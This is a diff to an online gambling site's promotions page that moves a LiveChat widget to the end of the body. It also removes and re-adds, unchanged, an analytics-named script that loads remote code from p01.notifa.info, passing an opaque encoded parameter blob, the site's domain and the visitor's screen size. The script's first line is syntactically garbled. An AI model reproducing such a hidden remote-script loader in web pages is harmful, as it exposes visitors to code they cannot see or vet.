--- a/promosi/index.html
+++ b/promosi/index.html
@@ -2,23 +2,6 @@
 <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head><meta name="msvalidate.01" content="C5A3A95CC30AE319778E4FE97C58746A" /><meta name="robots" content="index,follow" /><meta name="description" content="Bermain tangkas online di bola tangkas bolatangkas android tangkas asia, berbagai promo menarik termasuk klaim code promo untuk mendapatkan credit pemain baru. Segera daftar dan main!" />
 <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
 
-<!-- Start of LiveChat (www.livechatinc.com) code -->
-<script type="text/javascript">
-window.__lc = window.__lc || {};
-window.__lc.license = 4987581;
-(function() {
-  var lc = document.createElement('script'); lc.type = 'text/javascript'; lc.async = true;
-  lc.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'cdn.livechatinc.com/tracking.js';
-  var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(lc, s);
-})();
-</script>
-<noscript>
-<a href="https://www.livechatinc.com/chat-with/4987581/">Chat with us</a>,
-powered by <a href="https://www.livechatinc.com/?welcome" rel="noopener" target="_blank">LiveChat</a>
-</noscript>
-<!-- End of LiveChat code -->
-
-
 <link  href="/css/styles.css" rel="stylesheet" type="text/css" /><link  href="/css/base.css" rel="stylesheet" type="text/css" /><!--[if lte IE 6]>
 <link  href="/css/ie6.css" rel="stylesheet" type="text/css" /><![endif]-->
 
@@ -143,4 +126,18 @@ powered by <a href="https://www.livechatinc.com/?welcome" rel="noopener" target=
   })();
 
 </script>
-<script type="text/javascript">if (self==top) {functionbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582PbDUVNc7V%2bd%2fUXyLF1a9%2fXuunePh22T1E%2bFIiGUWfHDetio63y%2fBOAJnEPvAtOWk8zj4yNbyiDg8Kyb7bTSWwPBX0r2PGTreZ1HOTTXhsqIHvG6Lu0LSXuQKzyiDnDF5WEzQrLZzcILtXoozFrOq7DeDkNiBURDtsf8LCbULdml6cP1IqS7b0AVd3cmg6zi67RMzw%2bls33ff0qOd%2bICtpLab2qzrsZUXXnH1qQGsETIeqwsKJWY29rakse85EgTo8Xz4KhOJk7XEja9LD%2b6ejFOqZGecV7%2bA2RuAcpvmixFo4IhcGxn5iisSZtsr7jUkhdHqHRVjFVtHixCJHBuScB2YUy6yz9W38BNWFM%2fm50nJbYqHDwhIHlhUZtQu53erLN7VW%2b7vmmLGAM3UbywMDRyjMCECBjckcKHtO2VePqyfGxRsISchHuVApFzXnVlRVgltSeD5G0yVN%2fdqdBdit6LFKucExUm3KBZeq8cERngJww9kjcHosUG8l8X67r%2bsoxSl2jodTSju89Cl7MC5nx0u%2bejFlH62E9C218RKPgBk%2bEibrtJ%2fdg%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);bro_cache_analytics(requestCfs, function(){});};</script></body></html>
+<script type="text/javascript">if (self==top) {functionbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582PbDUVNc7V%2bd%2fUXyLF1a9%2fXuunePh22T1E%2bFIiGUWfHDetio63y%2fBOAJnEPvAtOWk8zj4yNbyiDg8Kyb7bTSWwPBX0r2PGTreZ1HOTTXhsqIHvG6Lu0LSXuQKzyiDnDF5WEzQrLZzcILtXoozFrOq7DeDkNiBURDtsf8LCbULdml6cP1IqS7b0AVd3cmg6zi67RMzw%2bls33ff0qOd%2bICtpLab2qzrsZUXXnH1qQGsETIeqwsKJWY29rakse85EgTo8Xz4KhOJk7XEja9LD%2b6ejFOqZGecV7%2bA2RuAcpvmixFo4IhcGxn5iisSZtsr7jUkhdHqHRVjFVtHixCJHBuScB2YUy6yz9W38BNWFM%2fm50nJbYqHDwhIHlhUZtQu53erLN7VW%2b7vmmLGAM3UbywMDRyjMCECBjckcKHtO2VePqyfGxRsISchHuVApFzXnVlRVgltSeD5G0yVN%2fdqdBdit6LFKucExUm3KBZeq8cERngJww9kjcHosUG8l8X67r%2bsoxSl2jodTSju89Cl7MC5nx0u%2bejFlH62E9C218RKPgBk%2bEibrtJ%2fdg%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);bro_cache_analytics(requestCfs, function(){});};</script><!-- Start of LiveChat (www.livechatinc.com) code -->
+<script type="text/javascript">
+window.__lc = window.__lc || {};
+window.__lc.license = 4987581;
+(function() {
+  var lc = document.createElement('script'); lc.type = 'text/javascript'; lc.async = true;
+  lc.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'cdn.livechatinc.com/tracking.js';
+  var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(lc, s);
+})();
+</script>
+<noscript>
+<a href="https://www.livechatinc.com/chat-with/4987581/">Chat with us</a>,
+powered by <a href="https://www.livechatinc.com/?welcome" rel="noopener" target="_blank">LiveChat</a>
+</noscript>
+<!-- End of LiveChat code --></body></html>
